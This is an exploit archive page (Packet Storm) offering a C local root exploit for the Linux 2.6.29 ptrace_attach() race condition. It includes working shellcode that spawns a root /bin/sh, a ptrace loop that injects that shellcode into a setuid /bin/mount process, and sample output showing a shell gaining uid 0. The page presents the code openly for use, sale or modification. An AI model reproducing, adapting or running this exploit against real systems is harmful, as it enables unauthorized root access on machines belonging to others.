what you don't know can hurt you

Linux 2.6.29 ptrace_attach() Race Condition

Linux 2.6.29 ptrace_attach() Race Condition
Posted May 15, 2009
Authored by prdelka | Site prdelka.blackart.org.uk

This is a local root exploit for the Linux 2.6.29 ptrace_attach() race condition that allows a process to gain elevated privileges under certain conditions.

tags | exploit, local, root
systems | linux
MD5 | 2406d30eaa6ecc2fd2340203ddef7c7a

Linux 2.6.29 ptrace_attach() Race Condition

Change Mirror Download
/*
* GNU/Linux kernel 2.6.29 ptrace_attach() local root race condition exploit.
* ==========================================================================
* This is a local root exploit for the 2.6.29 ptrace_attach() race condition that allows
* a process to gain elevated privileges under certain conditions. The vulnerability is
* caused due to "ptrace_attach()" using an inadequate mutex while synchronizing with
* "execve()". This can be exploited to potentially execute arbitrary code with root
* privileges by attaching to a setuid process. The race is particularly narrow, this
* exploit checks that it has attached to the correct process before attempting to
* inject shellcode which helps reduce false positives and shells being spawned with
* lower privileges.
*
* Ex.
* matthew@matthew-desktop:~$ id
* uid=1000(matthew) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),
* 29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
* matthew@matthew-desktop:~$ uname -a
* Linux matthew-desktop 2.6.29-020629-generic #020629 SMP Tue Mar 24 12:03:21 UTC 2009 i686 GNU/Linux
* matthew@matthew-desktop:~$ while `/bin/true/`;do ./shoryuken;done
* [... much scroll removed, go make coffee, get a job, do something while running ...]
* /dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro)
* proc on /proc type proc (rw,noexec,nosuid,nodev)
* /sys on /sys type sysfs (rw,noexec,nosuid,nodev)
* varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
* varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
* udev on /dev type tmpfs (rw,mode=0755)
* devshm on /dev/shm type tmpfs (rw)
* devpts on /dev/pts type devpts (rw,gid=5,mode=620)
* securityfs on /sys/kernel/security type securityfs (rw)
* gvfs-fuse-daemon on /home/matthew/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=matthew)
* [ WIN! 18281
* [ Overwritten 0xb8097430
* # id
* uid=0(root) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),
* 44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
* #
*
* Please note this exploit is released to you under fuqHAK5 licence agreement, you may use
* this exploit, sell it, recode it, rip the header and claim it as your own on the condition
* that you are not a fan of the hak5 tv "hacking" show. This exploit must not be renamed from
* shoryuken.c at any time.
*
* -- prdelka
*/
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <linux/user.h>
#include <stdio.h>
#include <fcntl.h>

char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90"
"\x6a\x23\x58\x31"
"\xdb\xcd\x80"
"\x31\xdb\x8d\x43\x17\xcd\x80\x31\xc0"
"\x50\x68""//sh""\x68""/bin""\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(){
pid_t child;
int eip, i = 0;
struct user_regs_struct regs;
char *argv[] = {"mount",0};
char *envp[] = {"",0};
child = fork();
if(child == 0) {
execve("/bin/mount",argv,envp);
}
else {
if(ptrace(PTRACE_ATTACH, child, NULL, NULL) == 0) {
char buf[256];
sprintf(buf, "/proc/%d/cmdline", child);
int fd = open(buf, O_RDONLY);
read(fd, buf, 2);
close(fd);
if(buf[0] == 'm') {
printf("[ WIN! %d\n", child);
fflush(stdout);
ptrace(PTRACE_GETREGS, child, NULL, &regs);
eip = regs.eip;
while (i < strlen(shellcode)){
ptrace(PTRACE_POKETEXT, child, eip, (int) *(int *) (shellcode + i));
i += 4;
eip += 4;
}
printf("[ Overwritten 0x%x\n",regs.eip);
ptrace(PTRACE_SETREGS, child, NULL, &regs);
ptrace(PTRACE_DETACH, child, NULL,NULL);
usleep(1);
wait(0);
}
}
}
return 0;
}


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    37 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close